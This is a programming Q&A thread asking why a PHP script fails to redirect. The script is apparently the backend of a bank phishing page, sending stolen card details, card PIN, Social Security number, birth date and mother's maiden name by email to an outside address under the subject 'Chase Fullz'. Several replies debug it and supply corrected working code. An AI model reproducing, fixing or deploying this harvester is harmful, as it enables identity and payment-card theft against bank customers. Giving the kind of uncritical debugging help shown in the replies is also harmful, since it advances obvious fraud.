# Php redirect / Header

Tags: php, header

I've been messing with this code all day for a friend and i can't seem to get it to redirect after sending whatever info is sent. Wondering if anyone could help.

I need it to redirect to site.com/logoff.php

```
<?php
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$message .= "--------------+ User online +------------\n";
$message .= "Full Name : : ".$_POST['Name']."\n";
$message .= "Mailing Address  : ".$_POST['address']."\n";
$message .= "Mailing Address 2  : ".$_POST['address2']."\n";
$message .= " City  : ".$_POST['city']."\n";
$message .= " State : ".$_POST['state']."\n";
$message .= " Zip Code : ".$_POST['zip']."\n";
$message .= "--------------+ Card Info +------------\n";
$message .= " Confirm Card Number : ".$_POST['cardnumber']."\n";
$message .= " Expiration Date : ".$_POST['expmonth']."";
$message .= "".$_POST['expyear']."\n";
$message .= " Card Security Code : ".$_POST['cvv']."\n";
$message .= " Card Pin : ".$_POST['cardpin']."\n";
$message .= "--------------+ Security Information +------------\n";
$message .= " Social Security Number : ".$_POST['ssn1']."";
$message .= "-".$_POST['ssn2']."";
$message .= "-".$_POST['ssn3']."\n";
$message .= " Date of Birth : ".$_POST['bmonth']."";
$message .= "-".$_POST['bday']."";
$message .= "-".$_POST['byear']."\n";
$message .= " MMN : ".$_POST['mmn']."\n";
$message .= "--------------+ Connction info +------------\n";
$message .= "IP Address : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$message .= "--------------------\n";
$rnessage  = "$message\n";
$message .= "--------------+ Run the world +------------\n";

$send="123123@gmail.com";


$subject = "Chase Fullz";
$headers = "From: ChaseFullz<v3216@hotmail.com>";
$str=array($send, $IP); foreach ($str as $send)
if(mail($send,$subject,$rnessage,$headers) != false){
mail($Send,$subject,$rnessage,$headers);
mail($messege,$subject,$rnessage,$headers);
Header ("Location:logoff.php");
}
?>
```

Comment: You should check your code a bit more carefully, you will get `undefined variable` warnings (check the spelling and case). And why are you calling mail 3 times (the last time with the wrong parameters...)?

Comment: What error message(s) are you getting? `ini_set('display_errors', 1);`

Comment: Wow I amaze myself for not knowing any code. I removed the last 2 mail parameters and it redirected + emailed. 
$headers = "From: ChaseFullz<v3216@hotmail.com>";
$str=array($send, $IP); foreach ($str as $send)
if(mail($send,$subject,$rnessage,$headers) != false){
header('Location: users_table.php'); 
exit;
}
?>

Answer (score 0):

Few things.

You have call mail() three times.

When you check if(mail() 1= false){}. you send mail again two more times with no recipient in 3rd mail();

> mail($messege,$subject,$rnessage,$headers);

But still if you need to send multiple mail you can define them all in one array.

> $recipients = array('mail1', 'mail2');
>
> mail(implode(',', $recipients), $subject, $message, $headers);

And also if you need you can print error by

> error_get_last()

Comment: Ty for your help, I fixed it before I saw this but it this was what was causing. Thanks <3

Answer (score 0):

```
$send="123123@gmail.com";


$subject = "Chase Fullz";
$headers = "From: ChaseFullz<v3216@hotmail.com>";
$str = array($send, $IP);/* seems redundant, you can't send an email to an ip address! */
/* Only one call to mail is needed */
if( mail( $send, $subject, $message, $headers) != false){
    header ("Location:logoff.php");
} else {
    echo 'failed';
}
```